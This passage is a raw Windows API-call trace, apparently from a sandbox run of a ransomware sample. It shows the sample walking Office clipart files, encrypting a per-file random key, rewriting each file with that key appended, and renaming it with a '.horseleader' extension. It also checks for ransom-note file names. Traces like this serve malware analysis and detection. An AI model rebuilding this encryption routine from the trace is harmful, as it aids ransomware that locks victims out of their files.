(lpString1="BS01080_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.747] lstrlenW (lpString=".testttjffg") returned 11 [0253.747] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.747] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.747] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.747] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.748] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 67 [0253.748] StrStrW (lpFirst="BS01080_.WMF", lpSrch=".txt") returned 0x0 [0253.748] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2732) returned 1 [0253.748] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xaac, lpOverlapped=0x0) returned 1 [0253.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff554, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.750] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xaac, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xaac, lpOverlapped=0x0) returned 1 [0253.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.750] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.750] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.751] CloseHandle (hObject=0x158) returned 1 [0253.751] GetProcessHeap () returned 0x780000 [0253.751] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.751] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.horseleader") returned 79 [0253.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf.horseleader")) returned 1 [0253.752] GetProcessHeap () returned 0x780000 [0253.752] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.752] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d186600, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d186600, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1c08, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01603_.WMF", cAlternateFileName="")) returned 1 [0253.752] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="Windows") returned -1 [0253.752] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 67 [0253.752] StrStrIW (lpFirst="BS01603_.WMF", lpSrch=".horseleader") returned 0x0 
[0253.752] lstrcmpW (lpString1="BS01603_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.752] lstrcmpW (lpString1="BS01603_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.752] lstrlenW (lpString=".testttjffg") returned 11 [0253.752] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.752] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.752] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.753] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 67 [0253.754] StrStrW (lpFirst="BS01603_.WMF", lpSrch=".txt") returned 0x0 [0253.754] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7176) returned 1 [0253.754] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1c08, lpOverlapped=0x0) returned 1 [0253.756] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe3f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.756] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1c08, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1c08, lpOverlapped=0x0) returned 1 
[0253.756] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.756] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.756] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.757] CloseHandle (hObject=0x158) returned 1 [0253.757] GetProcessHeap () returned 0x780000 [0253.757] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.757] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.horseleader") returned 79 [0253.757] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf.horseleader")) returned 1 [0253.758] GetProcessHeap () returned 0x780000 [0253.758] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.758] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc31ccd00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc31ccd00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0xda6, 
dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01634_.WMF", cAlternateFileName="")) returned 1 [0253.758] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="Windows") returned -1 [0253.758] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 67 [0253.758] StrStrIW (lpFirst="BS01634_.WMF", lpSrch=".horseleader") returned 0x0 [0253.758] lstrcmpW (lpString1="BS01634_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.758] lstrcmpW (lpString1="BS01634_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.758] lstrlenW (lpString=".testttjffg") returned 11 [0253.758] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.758] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.758] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.759] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 67 [0253.759] StrStrW (lpFirst="BS01634_.WMF", lpSrch=".txt") returned 0x0 [0253.759] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3494) returned 1 [0253.759] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0xda6, lpOverlapped=0x0) returned 1 [0253.761] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff25a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.761] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xda6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xda6, lpOverlapped=0x0) returned 1 [0253.761] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.762] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.762] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.762] CloseHandle (hObject=0x158) returned 1 [0253.762] GetProcessHeap () returned 0x780000 [0253.762] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.762] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.horseleader") returned 79 [0253.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf.horseleader")) returned 1 [0253.763] GetProcessHeap () returned 0x780000 [0253.763] HeapFree (in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.763] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63bebd00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x63bebd00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3a94, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01635_.WMF", cAlternateFileName="")) returned 1 [0253.763] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="Windows") returned -1 [0253.763] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 67 [0253.763] StrStrIW (lpFirst="BS01635_.WMF", lpSrch=".horseleader") returned 0x0 [0253.763] lstrcmpW (lpString1="BS01635_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.763] lstrcmpW (lpString1="BS01635_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.763] lstrlenW (lpString=".testttjffg") returned 11 [0253.764] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.764] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.764] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.764] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 67 [0253.764] StrStrW (lpFirst="BS01635_.WMF", lpSrch=".txt") returned 0x0 [0253.764] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14996) returned 1 [0253.764] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3a94, lpOverlapped=0x0) returned 1 [0253.769] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc56c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.770] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3a94, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3a94, lpOverlapped=0x0) returned 1 [0253.770] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.770] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.770] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.770] CloseHandle (hObject=0x158) returned 1 [0253.771] GetProcessHeap () returned 0x780000 [0253.771] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.771] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.horseleader") returned 79 [0253.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf.horseleader")) returned 1 [0253.772] GetProcessHeap () returned 0x780000 [0253.772] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.772] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe440e600, ftCreationTime.dwHighDateTime=0x1bd4bee, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe440e600, ftLastWriteTime.dwHighDateTime=0x1bd4bee, nFileSizeHigh=0x0, nFileSizeLow=0x752, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01636_.WMF", cAlternateFileName="")) returned 1 [0253.773] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="Windows") returned -1 [0253.773] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 67 [0253.774] StrStrIW (lpFirst="BS01636_.WMF", lpSrch=".horseleader") returned 0x0 [0253.774] lstrcmpW (lpString1="BS01636_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.774] lstrcmpW (lpString1="BS01636_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.774] lstrlenW (lpString=".testttjffg") returned 11 [0253.774] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.774] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.774] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.774] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.775] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 67 [0253.775] StrStrW (lpFirst="BS01636_.WMF", lpSrch=".txt") returned 0x0 [0253.775] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1874) returned 1 [0253.775] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x752, lpOverlapped=0x0) returned 1 [0253.778] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff8ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.778] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x752, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x752, lpOverlapped=0x0) returned 1 [0253.778] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.778] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.778] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.779] CloseHandle 
(hObject=0x158) returned 1 [0253.779] GetProcessHeap () returned 0x780000 [0253.779] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.779] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.horseleader") returned 79 [0253.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf.horseleader")) returned 1 [0253.780] GetProcessHeap () returned 0x780000 [0253.780] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.780] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910b6b00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x910b6b00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf6c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01637_.WMF", cAlternateFileName="")) returned 1 [0253.781] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="Windows") returned -1 [0253.781] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 67 [0253.781] StrStrIW (lpFirst="BS01637_.WMF", lpSrch=".horseleader") returned 0x0 [0253.781] lstrcmpW (lpString1="BS01637_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.781] lstrcmpW (lpString1="BS01637_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.781] lstrlenW 
(lpString=".testttjffg") returned 11 [0253.781] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.781] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.781] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.782] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 67 [0253.782] StrStrW (lpFirst="BS01637_.WMF", lpSrch=".txt") returned 0x0 [0253.782] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3948) returned 1 [0253.783] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf6c, lpOverlapped=0x0) returned 1 [0253.787] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff094, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.787] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf6c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf6c, lpOverlapped=0x0) returned 1 [0253.787] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.787] WriteFile (in: hFile=0x158, 
